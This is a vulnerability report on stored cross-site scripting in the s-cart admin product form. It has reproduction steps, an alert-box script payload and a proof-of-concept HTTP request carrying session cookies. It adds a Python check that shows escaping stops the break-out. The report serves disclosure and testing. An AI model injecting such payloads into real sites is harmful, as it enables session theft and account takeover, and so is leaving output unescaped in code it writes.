Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.
Steps to reproduce:

1. `git clone https://github.com/s-cart/s-cart` and `composer install`.
2. Log in as admin and add a product.
3. Enter the XSS payload `"><script>alert("test")</script>` as the Product title or as a Keyword; both fields are vulnerable.
4. Click Send and observe the popup.

## POC request:

```http
POST /s-cart/public/sc_admin/product/create HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------391325859225283787311340371998
Content-Length: 3823
Origin: http://localhost:8000
Connection: keep-alive
Referer: http://localhost:8000/s-cart/public/sc_admin/product/create
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; curSection_options=%22meta-polja%22; localhost-cms-admin-files1=%7B%220%22%3A0%7D; BLUDIT-KEY=r7oq4j0i11ldvm76u09r82mfdo; online_inovicing_system=r0e1337b4kup6v48o6t3qal0s7; cat_session_id=1sfltmkpoq80mv9hqhti0d8oug; XSRF-TOKEN=eyJpdiI6ImtXNlZMcDY4SmtOWVRGQUpqTFp1a2c9PSIsInZhbHVlIjoiTzA3cGZNemViTWcra2FPSitqaFVXeE9OWHdvZW42Wk1ML3hpbE1uRTVPcit2M2FaMzBWK3ZORkxaRStNbDFQSWdBNnlVanhFdm1kMlRzSHN3SlEydDJRMHYwcXJaV0wxTVJIUzhIcWJhcGpXVFE0c0RYWUw4cGRHQThBL1o3SW0iLCJtYWMiOiIxZmNhZjg1NjFjOTA4YmJiOWM2OTlmN2VmMDI4OTg1OTRkOWU4YzJhZDVhODk1YmQ3MGMwNTBiMjYzYWEyYmVhIn0%3D; scart_session=eyJpdiI6ImZhaXY5ZUFzenZuRTNoTUY5TmcvRFE9PSIsInZhbHVlIjoiVHB4M09id25mV0IzbFoyd1lKY3R3QWxzaHFnYlVRcldOeGpGMkRwc0YrM3Zuc1dIbDlmZWtpVElGZWc5Q21RckJuMFVMeHpQMTlNUGN0dlp0SkxNenY4OVlrbVJxSC9QS0FpTnBNMUsvTFI2L1d0UHRKSmFvdG9Gem1BNUtOYWUiLCJtYWMiOiIxYzViNmQ1MTU2OGJjNmQwNzBiMzM2YWUxY2M2NTdmZmE1ZjE0YTlkZDkzNDEwMmUyNGYzMzNlODQ4ZTYyOTM5In0%3D
Upgrade-Insecure-Requests: 1
```

The multipart body (3823 bytes) is not reproduced in the report; the payload is carried in the product title or keyword field of that form.
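The check a tester would want to automate for step 4, as an added example that is not part of the report and not s-cart code: render the stored title the way a vulnerable page would (raw interpolation into an attribute and a heading) next to an output-escaped version, then use the HTML parser to decide whether the payload from the report actually broke out of its context. The two template strings are assumptions about the shape of the rendered page, not s-cart's real views; the same `script_tags` check can be run over a real response body fetched after saving the product.

```python
"""Offline check for the stored XSS described in the report.

Added example, not s-cart code. Models a page that writes a stored
product title into an attribute and a heading without escaping, next
to the same page with output escaping, and parses the result to see
whether the payload yields a real <script> element.
"""
import html
from html.parser import HTMLParser

# Payload taken from the report's step 3.
PAYLOAD = '"><script>alert("test")</script>'


def render_unsafe(title: str) -> str:
    """Assumed shape of the vulnerable output: raw interpolation of the
    stored field into an attribute value and into element text."""
    return f'<input name="name" value="{title}"><h1>{title}</h1>'


def render_safe(title: str) -> str:
    """Hardened version of the same output: escape on output.
    quote=True also turns " and ' into entities, which is what stops
    the attribute break-out in the report's payload."""
    esc = html.escape(title, quote=True)
    return f'<input name="name" value="{esc}"><h1>{esc}</h1>'


class _TagCollector(HTMLParser):
    """Collects every start tag the parser sees, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def script_tags(doc: str) -> int:
    """Number of <script> start tags the HTML parser finds in doc."""
    p = _TagCollector()
    p.feed(doc)
    p.close()
    return p.tags.count("script")


def payload_breaks_out(doc: str, expected_script_tags: int = 0) -> bool:
    """True if the page contains more <script> elements than it should.

    expected_script_tags is the count a clean copy of the page carries
    (legitimate inline scripts); anything above that came from stored data.
    """
    return script_tags(doc) > expected_script_tags


if __name__ == "__main__":
    for name, page in (("unsafe", render_unsafe(PAYLOAD)),
                       ("safe", render_safe(PAYLOAD))):
        print(f"{name}: {script_tags(page)} script tag(s), "
              f"breaks out = {payload_breaks_out(page)}")
```

In the unsafe rendering the payload closes the `value` attribute and the `<input>` tag, so the parser sees a `<script>` element at both injection points; in the escaped rendering it sees only text. Counting parsed `<script>` elements rather than grepping for the raw payload string is deliberate: a response that contains `&lt;script&gt;` is safe even though the substring `script` is still there.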
With XSS an attacker can perform social engineering on users by redirecting them from the real website to a fake one, steal their cookies (leading to account takeover), or push malware onto their systems; a skilled attacker can build many further attack scenarios on it. In this case the XSS is stored: the payload is saved in the product title or keyword by an authenticated admin and then executes for whoever loads a page that renders that field.